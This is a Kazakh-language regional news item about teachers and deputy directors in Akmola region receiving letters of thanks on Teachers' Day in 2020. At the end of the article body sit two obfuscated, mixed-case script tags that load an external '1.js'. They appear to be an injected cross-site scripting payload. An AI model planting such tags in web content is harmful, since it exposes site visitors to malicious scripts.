2020 жылдың қазан айының 12-ші жұлдызында Қазақстан Республикасының Білім және ғылым министрлігінің Білім және ғылым саласында сапаны қамтамасыз ету Комитетінің тарапынан мұғалімдер күніне орай марапатталған Ақмола облысының білім саласында сапаны қамтамасыз ету департаментінің тарапынан өткізілетін бақылау шараларына қатысқан ұстаздарды Департамент басшысы С.Т.Алтаев құттықтап, алғыс хаттарды берді. Бірнеше жыл қатарымен сарапшы ретінде Департаментпен тығыз жұмыс жасап, өз біліктілігін, шеберін, іскерлігін көрсеткен ұстаздар марапатқа ие болды. Атап өтсек, Көкшетау қаласы білім бөлімінің «Сәкен Жүнісов атындағы №18 орта мектеп-лицейі» орыс тілі мен әдебиет мұғалімі С.А.Калиева, Зеренді ауданы білім бөлімінің «Бірлестік орта мектебі» директорының оқу жұмысы жөніндегі орынбасары С.К. Турысбекова, Степногорск қаласы білім бөлімінің «Ақсу кентіндегі №1 орта мектебі» директорының оқу жұмысы жөніндегі орынбасары Г.Б. Кульмагамбетова , Көкшетау қаласы білім бөлімінің «№13 «Экос» экологиялық мектеп-гимназиясы» тарих пәнінің мұғалімі С.С.Бакирова, Бурабай ауданы білім бөлімінің «Зеленобор мектеп-гимназиясы» директорының оқу жұмысы жөніндегі орынбасары М.А.Баймаханов. Ұстаздарға зор денсаулық, шығармашылық табыс тілейміз.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.10.2020
Просмотров: 519


Пікір қосу



Деректерді қолтаңбаға қосу